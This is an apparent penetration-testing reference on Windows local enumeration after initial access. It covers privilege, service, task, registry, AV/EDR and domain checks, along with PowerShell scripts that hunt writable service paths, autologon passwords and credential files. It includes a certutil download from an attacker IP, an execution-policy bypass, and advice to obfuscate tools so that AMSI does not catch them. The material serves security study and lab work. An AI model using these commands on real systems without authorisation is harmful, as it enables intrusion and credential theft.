
Windows Local Enumeration

#Overview

Windows local enumeration is performed after gaining access to a Windows host (via WinRM, RDP, Meterpreter, or webshell). The goal is to gather user context, identify privilege escalation vectors, discover domain information, locate credentials, and assess the security posture of the host. Windows provides many built-in tools (whoami, net, sc, schtasks, wmic, PowerShell cmdlets) and there are excellent third-party enumeration scripts (winpeas, Seatbelt, PowerUp, SharpUp) that automate the process.

#Prerequisites

  • Tools: winpeas.exe, Seatbelt.exe, PowerUp.ps1, SharpUp.exe, PowerView.ps1, PowerMad.ps1, Rubeus.exe
  • Access Level: Shell access on Windows host (PowerShell, cmd)
  • File Transfer: Evil-WinRM upload, certutil download, IEX cradle, SMB share, Impacket smbserver

#Detection & Enumeration

#Automated Enumeration Tools

winpeas.exe (Primary Automated Tool)

# Upload via Evil-WinRM
*Evil-WinRM* PS> upload winpeas.exe
*Evil-WinRM* PS> .\winpeas.exe

# Download from attacker HTTP server
certutil -urlcache -f http://10.10.14.41/winpeas.exe winpeas.exe
.\winpeas.exe

# Key winpeas sections:
# - "System Information" (OS version, hotfixes, architecture)
# - "Users" (local and domain, groups)
# - "Services" (unquoted paths, modifiable binaries)
# - "Scheduled Tasks" (writable scripts)
# - "Installed Software" (vulnerable versions)
# - "Network" (interfaces, routes, listening ports)
# - "Windows Credentials" (Credential Manager, DPAPI)
# - "AutoLogon Credentials"
# - "AlwaysInstallElevated Registry Check"
POWERSHELL

Seatbelt.exe (Situational Awareness)

# All checks (be selective in production)
.\Seatbelt.exe -group=all

# Specific checks:
.\Seatbelt.exe -group=user           # User context and groups
.\Seatbelt.exe -group=system         # OS, patches, environment
.\Seatbelt.exe -group=misc           # Interesting files, Chrome data, Putty sessions
.\Seatbelt.exe OSInfo
.\Seatbelt.exe WindowsCredentialFiles
.\Seatbelt.exe InterestingProcesses
.\Seatbelt.exe LocalGPO
POWERSHELL

PowerUp.ps1 / SharpUp.exe (Privilege Escalation Focus)

# PowerUp (PowerShell)
. .\PowerUp.ps1
Invoke-AllChecks

# SharpUp (C# compiled, fewer PowerShell restrictions)
.\SharpUp.exe audit

# Key misconfigurations detected:
# - Unquoted service paths
# - Service binary permissions (modifiable by current user)
# - AlwaysInstallElevated registry keys
# - DLL hijacking via PATH
POWERSHELL

#Manual Enumeration Commands

User Context and Privileges

# Full user information
whoami /all

# Check specific privileges
whoami /priv

# Key privileges that enable privilege escalation:
# SeImpersonatePrivilege   -- Potato family exploits (Juicy, Rogue, PrintSpoofer)
# SeAssignPrimaryTokenPrivilege  -- Potato exploits
# SeBackupPrivilege         -- Backup operators can read any file
# SeRestorePrivilege        -- Can write any file
# SeDebugPrivilege          -- Can debug/impersonate any process
# SeTakeOwnershipPrivilege  -- Can take ownership of any securable object
# SeTcbPrivilege            -- "Act as part of operating system"

# Group membership
whoami /groups
net user %USERNAME%            # cmd syntax; in PowerShell write net user $env:USERNAME
net user %USERNAME% /domain    # the same account as the domain controller sees it

# Local users
net user
POWERSHELL
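The privilege mapping above, as an added worked example that is not part of the original page: a function that parses whoami /priv output and flags the privileges this section lists (plus SeLoadDriverPrivilege, a common addition to the same list), matching on presence rather than state, because a Disabled privilege can still be enabled by the process that holds it. The sample text is constructed to look like real whoami /priv output so the function can be exercised anywhere; on a Windows host pass the live output instead.

```powershell
# Added example: map whoami /priv output to escalation-relevant privileges.
# Presence is what matters; "Disabled" is just the token's default state.
$DangerousPrivileges = @{
    'SeImpersonatePrivilege'        = 'Potato family (PrintSpoofer, JuicyPotato, RoguePotato)'
    'SeAssignPrimaryTokenPrivilege' = 'Potato family'
    'SeBackupPrivilege'             = 'Read any file (e.g. copy SAM/SYSTEM hives)'
    'SeRestorePrivilege'            = 'Write any file (e.g. replace a service binary)'
    'SeDebugPrivilege'              = 'Open any process, steal its token'
    'SeTakeOwnershipPrivilege'      = 'Take ownership of any securable object'
    'SeTcbPrivilege'                = 'Act as part of the operating system'
    'SeLoadDriverPrivilege'         = 'Load a driver (vulnerable signed driver)'   # added beyond the page's list
}

function Find-DangerousPrivilege {
    param([Parameter(Mandatory)][string[]]$WhoamiPrivOutput)
    foreach ($line in $WhoamiPrivOutput) {
        # Rows look like: "SeImpersonatePrivilege   Impersonate a client after authentication   Disabled"
        if ($line -match '^(Se\w+Privilege)\s+.+?\s+(Enabled|Disabled)\s*$') {
            $name = $Matches[1]
            if ($DangerousPrivileges.ContainsKey($name)) {
                [pscustomobject]@{
                    Privilege = $name
                    State     = $Matches[2]
                    Technique = $DangerousPrivileges[$name]
                }
            }
        }
    }
}

# Constructed sample (not captured from a real host) shaped like whoami /priv output
$sample = @'
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Disabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
'@ -split "`r?`n"

Find-DangerousPrivilege -WhoamiPrivOutput $sample | Format-Table -AutoSize   # one row: SeImpersonatePrivilege, Disabled

# On the target, run it against the live token:
# Find-DangerousPrivilege -WhoamiPrivOutput (whoami /priv)
```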

System Information

# OS version and architecture
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

# Installed hotfixes (patches)
wmic qfe get Caption,Description,HotFixID,InstalledOn
systeminfo | findstr /C:"KB"

# WES-NG (Windows Exploit Suggester - Next Generation), run on the attacker machine against the saved systeminfo output.
# Refresh its CVE database first; a KB reported as "missing" may have been superseded by a later cumulative update, so verify before exploiting.
./wes.py --update
./wes.py systeminfo.txt --impact "Elevation of Privilege"

# Installed software (wmic product is slow and reconfigures MSI packages, see Common Pitfalls; prefer the registry Uninstall keys)
wmic product get name,version,vendor
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate
POWERSHELL

Service Enumeration

# List all services
sc query state= all
Get-Service

# Detailed service configuration (binary path, start name)
sc qc <ServiceName>

# Check service and binary permissions (Sysinternals accesschk; -accepteula suppresses the EULA prompt)
accesschk.exe -accepteula -uwcqv "Authenticated Users" *    # services whose configuration Authenticated Users can change
accesschk.exe -accepteula -uwcqv <ServiceName>              # who can reconfigure one service (-c = treat the name as a service)
accesschk.exe -accepteula -uwvq "<BinaryPath>"              # who can write the service binary itself (a file, so no -c)

# Unquoted service path detection (auto-start services outside C:\Windows whose path is not quoted).
# wmic is deprecated and removed from recent Windows 11 builds; there, fall back to sc qc or Get-CimInstance Win32_Service.
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """"

# Writable service binary checks
icacls "C:\Program Files\Vulnerable\service.exe"

# Service registry permissions (write access to a service key, e.g. SetValue for Users, lets you repoint ImagePath)
Get-Acl HKLM:\System\CurrentControlSet\Services\* | Format-List
POWERSHELL

Scheduled Tasks

# List all scheduled tasks (verbose LIST output is the easiest to grep)
schtasks /query /fo LIST /v

# Task name, command and account only (findstr has no "|" alternation; give it one /C: literal per string)
schtasks /query /fo LIST /v | findstr /i /C:"TaskName" /C:"Task To Run" /C:"Run As User"

# Tasks running as SYSTEM: read the "Run As User" line, then check the permissions of whatever "Task To Run" points to
schtasks /query /fo LIST /v | findstr /i /C:"TaskName" /C:"Task To Run" /C:"Run As User" | findstr /i /C:"SYSTEM" /C:"Task To Run" /C:"TaskName"

# Scheduled task definitions (XML). The folder is normally readable only by administrators, so from a
# low-privileged shell rely on schtasks /query and check the referenced script or binary instead.
dir C:\Windows\System32\Tasks\
POWERSHELL
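The two checks this section and the Service Enumeration section describe by hand (unquoted service paths with a writable intermediate directory, and SYSTEM scheduled tasks whose binary or script you can overwrite) share the same core question: can the current token write to a given path? The block below is an added example, not code from the page or from any of the tools it lists; it answers that question from the DACL once and reuses it for both checks. It assumes Windows PowerShell 5 or later on the target (CIM for Win32_Service, the ScheduledTasks module), run as the low-privileged user you already hold.

```powershell
# Added example: unquoted service paths and SYSTEM scheduled tasks writable by the current user.

$script:CurrentSids = $null
function Get-CurrentUserSids {
    # The caller's own SID plus every group SID in the token, cached for repeated ACL checks
    if (-not $script:CurrentSids) {
        $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
        $script:CurrentSids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    }
    $script:CurrentSids
}

function Test-WritableByCurrentUser {
    param([Parameter(Mandatory)][string]$Path)
    # Simplified DACL check: any Allow ACE for one of our SIDs granting a write-class right.
    # Deny ACEs are not evaluated, so confirm a hit by writing a harmless file before relying on it.
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    $writeMask = [System.Security.AccessControl.FileSystemRights]'CreateFiles, Write, Modify, FullControl'
    $sids = Get-CurrentUserSids
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if (($sids -contains $sid) -and (($ace.FileSystemRights -band $writeMask) -ne 0)) { return $true }
    }
    return $false
}

function Get-UnquotedServicePath {
    # For "C:\Program Files\My App\svc.exe -arg" the SCM tries C:\Program.exe, then
    # "C:\Program Files\My.exe", then the real binary; report every parent directory we can write to.
    Get-CimInstance Win32_Service | ForEach-Object {
        $svc = $_; $p = $svc.PathName
        if (-not $p -or $p.StartsWith('"') -or $p -notmatch ' ' -or $p -match '^[A-Za-z]:\\Windows\\') { return }
        $parts = $p -split ' '
        for ($i = 0; $i -lt $parts.Count - 1; $i++) {
            $prefix = $parts[0..$i] -join ' '
            if ($prefix -match '\.exe$') { break }      # reached the real executable; the rest are arguments
            $dir = Split-Path -Path $prefix -Parent
            if ($dir -and (Test-WritableByCurrentUser -Path $dir)) {
                [pscustomobject]@{ Service = $svc.Name; StartMode = $svc.StartMode; RunAs = $svc.StartName
                                   Path = $p; WritableDir = $dir; Plant = "$prefix.exe" }
            }
        }
    }
}

function Get-WritableSystemTaskAction {
    # Enabled tasks running as SYSTEM where the executable, or a script named in its arguments, is writable
    Get-ScheduledTask | Where-Object { $_.Principal.UserId -match 'SYSTEM$|S-1-5-18' -and $_.State -ne 'Disabled' } | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }                      # COM-handler actions have no Execute
            $targets = @([Environment]::ExpandEnvironmentVariables($action.Execute).Trim('"'))
            if ($action.Arguments -match '([A-Za-z]:\\[^"\s]+\.(ps1|bat|cmd|vbs|js|exe|dll))') { $targets += $Matches[1] }
            foreach ($t in $targets) {
                if (Test-WritableByCurrentUser -Path $t) {
                    [pscustomobject]@{ Task = $task.TaskName; TaskPath = $task.TaskPath; RunAs = $task.Principal.UserId; Writable = $t }
                }
            }
        }
    }
}

Get-UnquotedServicePath      | Format-Table -AutoSize
Get-WritableSystemTaskAction | Format-Table -AutoSize
```

A hit from Get-UnquotedServicePath still needs a way to restart the service (or a reboot for auto-start services), which is why StartMode and RunAs are part of the output; a writable SYSTEM task action needs only to wait for the next trigger.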

Registry Enumeration

# AlwaysInstallElevated (both keys must be set to 1 for MSI escalation)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# AutoRuns (startup programs)
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

# Image File Execution Options (IFEO) -- debugger hijack
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"

# LSA Protection
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL

# Credential caching
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v CachedLogonsCount

# Winlogon autologon credentials
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
POWERSHELL
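The two registry findings above that are most often misread, evaluated the way the Common Pitfalls section demands, as an added example rather than code from the page: AlwaysInstallElevated counts only when both hive values are 1, and an autologon entry is only a usable credential when AutoAdminLogon is on, with the password possibly held in the LSA "DefaultPassword" secret instead of the visible registry value. Assumes Windows PowerShell on the target; no elevated rights are needed.

```powershell
# Added example: AlwaysInstallElevated (both keys) and Winlogon autologon, with the caveats encoded.
function Test-AlwaysInstallElevated {
    $keys = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
            'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    $details = foreach ($k in $keys) {
        $v = (Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        [pscustomobject]@{ Key = $k; AlwaysInstallElevated = $v }
    }
    [pscustomobject]@{
        # msiexec runs the package as SYSTEM only if the machine policy AND the user policy both say 1
        Exploitable = (@($details | Where-Object { $_.AlwaysInstallElevated -eq 1 }).Count -eq 2)
        Details     = $details
    }
}

function Get-AutoLogonSetting {
    $wl = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -ErrorAction SilentlyContinue
    [pscustomobject]@{
        AutoAdminLogon = ($wl.AutoAdminLogon -eq '1')                # REG_SZ "1" when autologon is active
        Domain         = $wl.DefaultDomainName
        UserName       = $wl.DefaultUserName
        Password       = $wl.DefaultPassword                         # cleartext when present
        # Autologon on but no DefaultPassword value: the password sits in the LSA secret (needs SYSTEM to dump)
        PasswordInLsa  = (($wl.AutoAdminLogon -eq '1') -and -not $wl.DefaultPassword)
    }
}

Test-AlwaysInstallElevated | Format-List
Get-AutoLogonSetting       | Format-List
```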

Network Enumeration

# Interface and routing information
ipconfig /all
route print
arp -a

# Active connections and listening ports
netstat -ano
netstat -anob   # includes process name (may require admin)

# DNS cache
ipconfig /displaydns

# Hosts file entries (check for internal redirections)
type C:\Windows\System32\drivers\etc\hosts
POWERSHELL

Firewall Status

# netsh (works on every supported Windows version)
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all dir=in | findstr /i /C:"Rule Name" /C:"Enabled" /C:"Action" /C:"LocalPort"

# PowerShell (NetSecurity module, Windows 8 / Server 2012 and later). Protocol and port live on the
# port filter object, not the rule, so list the rule's own properties here.
Get-NetFirewallProfile | Format-Table Name, Enabled
Get-NetFirewallRule | Where-Object { $_.Enabled -eq 'True' -and $_.Direction -eq 'Inbound' } | Format-Table DisplayName, Action, Profile

# A profile with Enabled=False means the firewall is off for that network type (common in CTF/HTB)
Get-NetFirewallProfile | Select-Object Name, Enabled
POWERSHELL

AV/EDR Detection

# Windows Defender status
Get-MpComputerStatus | Select-Object AntivirusEnabled, AMServiceEnabled, RealTimeProtectionEnabled, AntispywareEnabled

# Check for Defender service
sc query windefend

# Check for other security products
Get-Process | Where-Object { $_.ProcessName -like "*defender*" -or $_.ProcessName -like "*sentinel*" -or $_.ProcessName -like "*crowd*" -or $_.ProcessName -like "*carbon*" }

# AMSI (Anti-Malware Scan Interface): there is no status cmdlet. On Windows 10 / Server 2016 and later amsi.dll is loaded into
# every PowerShell process and script blocks are handed to the providers registered under HKLM\SOFTWARE\Microsoft\AMSI\Providers
# (Defender's provider is there whenever Defender is on). Quick functional test: echo the Microsoft test string
# 'AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386' in the session; if PowerShell reports the content as blocked, AMSI is live.
POWERSHELL

PowerShell Context

# PowerShell version
$PSVersionTable

# Language mode (ConstrainedLanguage mode restricts .NET calls)
$ExecutionContext.SessionState.LanguageMode

# Execution Policy
Get-ExecutionPolicy -List

# PowerShell logging policy lives in subkeys, not in the parent key
Get-ItemProperty HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging   # EnableScriptBlockLogging -> Event ID 4104
Get-ItemProperty HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging        # EnableModuleLogging -> Event ID 4103
Get-ItemProperty HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription        # EnableTranscripting, OutputDirectory
POWERSHELL
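What will observe the PowerShell session you are typing into, gathered in one place, as an added example that covers both the AV/EDR and the PowerShell Context sections above (it is not code from the page): the registered AMSI providers resolved to a product name and DLL, the three logging policies, the language mode, and Defender real-time status when the Defender module exists. Assumes Windows PowerShell 5 or later; registry key and value names are the documented ones, and a product whose CLSID has no friendly name shows its DLL path instead.

```powershell
# Added example: what sees this PowerShell session (AMSI providers, logging policy, language mode, Defender).
function Get-AmsiProvider {
    $root = 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers'
    if (-not (Test-Path -Path $root)) { return }          # key absent: no providers registered on this build
    Get-ChildItem -Path $root | ForEach-Object {
        $clsid = $_.PSChildName                            # subkey name is the provider's COM CLSID
        $name = (Get-ItemProperty -Path "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid" -ErrorAction SilentlyContinue).'(default)'
        $dll  = (Get-ItemProperty -Path "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid\InprocServer32" -ErrorAction SilentlyContinue).'(default)'
        [pscustomobject]@{ CLSID = $clsid; Provider = $name; Dll = $dll }
    }
}

function Get-PowerShellVisibility {
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    # Small reader for "<subkey>\<value>" under the policy key; missing values come back $null
    $get = { param($sub, $name) (Get-ItemProperty -Path "$base\$sub" -Name $name -ErrorAction SilentlyContinue).$name }
    $defender = Get-Command Get-MpComputerStatus -ErrorAction SilentlyContinue
    [pscustomobject]@{
        ScriptBlockLogging = ((& $get 'ScriptBlockLogging' 'EnableScriptBlockLogging') -eq 1)   # 4104; PS5 still logs "suspicious" blocks without it
        ModuleLogging      = ((& $get 'ModuleLogging' 'EnableModuleLogging') -eq 1)             # 4103
        Transcription      = ((& $get 'Transcription' 'EnableTranscripting') -eq 1)
        TranscriptDir      = (& $get 'Transcription' 'OutputDirectory')
        LanguageMode       = $ExecutionContext.SessionState.LanguageMode.ToString()
        DefenderRealTime   = $(if ($defender) { (Get-MpComputerStatus).RealTimeProtectionEnabled } else { $null })
        AmsiProviders      = @(Get-AmsiProvider | ForEach-Object { if ($_.Provider) { $_.Provider } else { $_.Dll } })
    }
}

Get-PowerShellVisibility | Format-List
```

The same policies can also be set per user under HKCU:\SOFTWARE\Policies\Microsoft\Windows\PowerShell; point $base there to check that variant.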

Domain Information (if domain-joined)

# Get domain info via the ActiveDirectory module (present on DCs and wherever RSAT is installed; elsewhere use PowerView after dot-sourcing it)
Get-ADDomain

# Computer account quota (controls how many computers a user can add)
Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota

# Domain controller
Get-ADDomainController

# Domain users
Get-ADUser -Identity username -Properties *
Get-ADUser -Filter * | Select-Object Name, SamAccountName

# Group membership
Get-ADGroupMember -Identity "Domain Admins"
whoami /groups

# msDS-AllowedToActOnBehalfOfOtherIdentity (RBCD check). Get-DomainComputer is PowerView, so dot-source it first; "DC" is the target computer name
Get-DomainComputer DC | select name, msds-allowedtoactonbehalfofotheridentity
POWERSHELL
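The RBCD attribute above is a binary security descriptor, so selecting it only tells you that it is set, not who may delegate. The following is an added example, not code from the page or from PowerView: it decodes the descriptor into the principals it names and reads ms-DS-MachineAccountQuota, which decides whether a low-privileged user can create the computer account that RBCD abuse usually needs. It assumes the ActiveDirectory module; the decoder also accepts the raw byte[] PowerView returns. "DC01" in the usage line is a hypothetical computer name.

```powershell
# Added example: decode msDS-AllowedToActOnBehalfOfOtherIdentity and read the machine account quota.
function ConvertFrom-RbcdDescriptor {
    param([Parameter(Mandatory)]$Value, [string]$Target)
    $bytes = if ($Value -is [System.DirectoryServices.ActiveDirectorySecurity]) {
        $Value.GetSecurityDescriptorBinaryForm()            # AD module hands back a parsed object
    } else {
        [byte[]]$Value                                      # PowerView / raw LDAP: the binary SD itself
    }
    $sd = [System.Security.AccessControl.RawSecurityDescriptor]::new($bytes, 0)
    foreach ($ace in $sd.DiscretionaryAcl) {
        # Each ACE's trustee (normally a computer account) may impersonate users to $Target
        $sid = $ace.SecurityIdentifier
        $name = $null
        try { $name = $sid.Translate([System.Security.Principal.NTAccount]).Value } catch { }
        [pscustomobject]@{ Target = $Target; SID = $sid.Value; Principal = $name; AceType = $ace.AceType.ToString() }
    }
}

function Get-RbcdAllowedPrincipal {
    param([string]$Filter = '*')
    Get-ADComputer -Filter $Filter -Properties 'msDS-AllowedToActOnBehalfOfOtherIdentity' |
        Where-Object { $_.'msDS-AllowedToActOnBehalfOfOtherIdentity' } |
        ForEach-Object { ConvertFrom-RbcdDescriptor -Value $_.'msDS-AllowedToActOnBehalfOfOtherIdentity' -Target $_.Name }
}

function Get-MachineAccountQuota {
    # Default is 10; 0 means you need an existing computer account (or its hash) rather than creating one
    $dn = (Get-ADDomain).DistinguishedName
    (Get-ADObject -Identity $dn -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
}

Get-MachineAccountQuota
Get-RbcdAllowedPrincipal | Format-Table -AutoSize              # every computer that already has an RBCD entry
Get-RbcdAllowedPrincipal -Filter "Name -eq 'DC01'"             # one target (hypothetical name)
```

An existing entry pointing at an account you control, or a quota above 0 plus GenericWrite/WriteDacl on a target computer object, is the combination the Support machine note below refers to.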

Credential Discovery

# Stored credentials (Credential Manager); TERMSRV/<host> entries are saved RDP logons
cmdkey /list

# Credential Manager vaults
vaultcmd /list

# Windows autologon
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# DPAPI credential blobs (hidden files; dir does not accept wildcards in directory names, Get-ChildItem does)
Get-ChildItem -Force -ErrorAction SilentlyContinue C:\Users\*\AppData\Roaming\Microsoft\Credentials, C:\Users\*\AppData\Local\Microsoft\Credentials

# Search for interesting files (dir wants one space-separated path per pattern; unattend.xml, web.config and GPP Groups.xml are the classic finds)
dir C:\*.xml C:\*.config C:\*.ini C:\*.txt C:\*.kdbx /s /b
Get-ChildItem -Path C:\Users\ -Include *.xml,*.txt,*.kdbx,*.ini,*.config -Recurse -ErrorAction SilentlyContinue

# PowerShell history (current user, then every profile; type does not expand wildcards in the directory part)
Get-Content (Get-PSReadlineOption).HistorySavePath
Get-Content C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -ErrorAction SilentlyContinue
POWERSHELL
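The file search above lists candidates; the next step a practitioner takes is to grep them for password-looking content. The block below is an added example, not code from the page: it walks user profiles and the other usual locations for the listed extensions, skips oversized files, and runs a content regex that catches key=value secrets, GPP cpassword, connection strings and the unattend.xml Password element. The unattend.xml it writes to $env:TEMP is a constructed sample containing a made-up value, so the function can be exercised before it is pointed at C:\. Paths and patterns are the usual suspects, not an exhaustive list.

```powershell
# Added example: search likely locations for credential-bearing files and grep their content.
function Find-CredentialFile {
    param(
        [string[]]$Root = @("$env:SystemDrive\Users", "$env:SystemDrive\inetpub", "$env:windir\Panther", "$env:SystemDrive\ProgramData"),
        [string[]]$Include = @('*.xml','*.config','*.ini','*.txt','*.ps1','*.bat','*.cmd','*.kdbx','*.rdp','*.json','*.yml','*.yaml'),
        [int]$MaxSizeKB = 512
    )
    # key=value style, GPP cpassword, connection strings, apikey/secret, and the unattend.xml <Password> element
    $pattern = '(?i)(passw(or)?d|pwd|cpassword|connectionString|secret|apikey)\s*[:=>]|<Password>'
    foreach ($r in $Root) {
        if (-not (Test-Path -LiteralPath $r)) { continue }
        Get-ChildItem -Path $r -Include $Include -Recurse -Force -File -ErrorAction SilentlyContinue |
            Where-Object { $_.Length -le ($MaxSizeKB * 1KB) } |
            ForEach-Object {
                $f = $_
                if ($f.Extension -in '.kdbx', '.rdp') {
                    # Binary / saved-connection formats: the file itself is the finding
                    [pscustomobject]@{ File = $f.FullName; Line = $null; Match = "($($f.Extension) file)" }
                    return
                }
                Select-String -LiteralPath $f.FullName -Pattern $pattern -ErrorAction SilentlyContinue |
                    Select-Object -First 5 |
                    ForEach-Object { [pscustomobject]@{ File = $_.Path; Line = $_.LineNumber; Match = $_.Line.Trim() } }
            }
    }
}

# Constructed sample (the value is made up, not a real credential) so the function runs offline
$sampleDir = Join-Path $env:TEMP 'credhunt-sample'
New-Item -ItemType Directory -Path $sampleDir -Force | Out-Null
@'
<?xml version="1.0"?>
<unattend><AutoLogon><Password><Value>U3VwZXJTZWNyZXQ=</Value></Password><Username>svc_deploy</Username></AutoLogon></unattend>
'@ | Set-Content -Path (Join-Path $sampleDir 'unattend.xml')

Find-CredentialFile -Root $sampleDir | Format-Table -AutoSize   # one hit on the <Password> line
# Real run: Find-CredentialFile | Format-Table -AutoSize
```

Unattend.xml passwords are usually base64 of the cleartext with "Password" appended; GPP cpassword values decrypt with the published AES key, which is why both are worth a hit even when they are not plain text.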

#Common Pitfalls

  • Calling winpeas by bare name. PowerShell does not search the current directory for executables, so use .\winpeas.exe (and check that the upload kept the .exe extension).
  • Forgetting to import PowerShell modules before calling function. Always . .\PowerView.ps1 (dot-source) before using PowerView functions.
  • whoami /priv showing SeImpersonatePrivilege as disabled. The "Disabled" state is normal -- it CAN be enabled and used. The presence of the privilege is what matters.
  • Treating every path wmic prints as exploitable. Confirm with sc qc that the ImagePath really is unquoted and contains a space, that one of the intermediate directories is writable by you (C:\ and C:\Program Files\ normally are not), and that you can restart the service or it starts automatically.
  • wmic product get name is notoriously slow and runs a consistency check that can reconfigure packages, logging Application Event ID 1035 (source MsiInstaller, "reconfigured the product") for every installed MSI. Prefer registry enumeration of the Uninstall keys.
  • Checking AlwaysInstallElevated but forgetting BOTH registry keys must be set. HKLM and HKCU both need the value 1.
  • PowerShell execution policy blocking scripts. Use powershell -ep bypass to override.
  • AMSI blocking known offensive PowerShell scripts. Use obfuscation or compile tools as .exe (SharpUp instead of PowerUp) to evade.

#OPSEC Considerations

  • winpeas.exe generates extensive system query activity (registry reads, service enumeration, file checks). The sheer volume of operations from one binary is a strong IOC.
  • whoami /all and whoami /priv are common reconnaissance commands and are monitored by many EDR products. However, they are also legitimate admin commands, making detection reliant on behavioral context.
  • wmic product get queries the MSI database and logs MsiInstaller Event ID 1035 for every product it touches. A burst of these events is a well-known IOC for attacker enumeration of installed software.
  • powershell -ep bypass is visible on the command line (Event ID 4688 with command-line auditing, or Sysmon Event ID 1); what script block logging (Event ID 4104) records is the script content itself, bypass or not. Constrained language mode restricts what PowerShell can do regardless of execution policy.
  • AMSI (Anti-Malware Scan Interface) hands PowerShell script content to the AV engine before execution. Known scripts (PowerView, PowerUp) are signatured. Running the compiled C# equivalents as separate processes avoids PowerShell's AMSI hook, but the binary on disk is still scanned by the AV engine, and assemblies loaded in memory are AMSI-scanned on .NET Framework 4.8 and later.
  • netstat -ano and ipconfig /all are normal admin commands and blend in well with legitimate activity.
  • Reading registry keys related to passwords (Winlogon autologon, LSA secrets) triggers object-access events (Event ID 4663) only where a SACL has been set on those keys; LSA secrets additionally need SYSTEM to read, so dumping them is a privileged, and louder, step.
  • Evil-WinRM upload/download moves files inside the WinRM session (HTTP/5985 or HTTPS/5986), not over SMB. The transfer shows up in the Microsoft-Windows-WinRM/Operational log and, because Evil-WinRM drives PowerShell remoting, in PowerShell module/script block logs (Event IDs 4103/4104) on the target.
  • Domain enumeration from a non-DC host (Get-ADDomain, Get-ADUser) generates LDAP queries that are logged at the DC. The source host of the queries is recorded.

#Post-Exploitation Value

  • User privileges (SeImpersonate, SeBackup, SeDebug) directly map to known privilege escalation techniques.
  • Service misconfigurations (unquoted paths, writable binaries) provide reliable privesc paths.
  • AutoLogon credentials immediately grant lateral movement to the auto-logon user.
  • AlwaysInstallElevated allows crafting malicious MSI installers that run as SYSTEM.
  • Domain enumeration reveals group membership that may enable RBCD, DCSync, or other AD attacks.
  • Credential files (unattend.xml, web.config, group policy preferences) often contain cleartext or decryptable passwords.
  • Patch enumeration reveals known vulnerabilities that can be exploited for privilege escalation.

#Cross-References

#Tool References

Tool           | Description                                           | Link
winpeas.exe    | Comprehensive Windows privilege escalation enumerator | https://github.com/peass-ng/PEASS-ng
Seatbelt.exe   | C# situational awareness tool                         | https://github.com/GhostPack/Seatbelt
PowerUp.ps1    | PowerShell privilege escalation checker               | https://github.com/PowerShellMafia/PowerSploit
SharpUp.exe    | C# privilege escalation checker                       | https://github.com/GhostPack/SharpUp
PowerView.ps1  | PowerShell Active Directory recon                     | https://github.com/PowerShellMafia/PowerSploit
PowerMad.ps1   | PowerShell machine account manipulation               | https://github.com/Kevin-Robertson/Powermad
SharpHound.exe | BloodHound data collector                             | https://github.com/BloodHoundAD/BloodHound
Rubeus.exe     | Kerberos interaction tool                             | https://github.com/GhostPack/Rubeus
WES-NG         | Windows Exploit Suggester Next Generation             | https://github.com/bitsadmin/wesng
accesschk.exe  | Sysinternals permission checker                       | https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
Evil-WinRM     | PowerShell Remoting client                            | https://github.com/Hackplayers/evil-winrm

#Source Machines

  • Sauna (Easy, AD) -- WinPEAS reveals AutoLogon for svc_loanmanager; BloodHound shows DCSync rights
  • Forest (Easy, AD) -- SharpHound collection reveals Account Operators membership and Exchange Windows Permissions WriteDacl
  • Support (Easy, Windows) -- PowerView/PowerMad for domain enumeration and RBCD attack
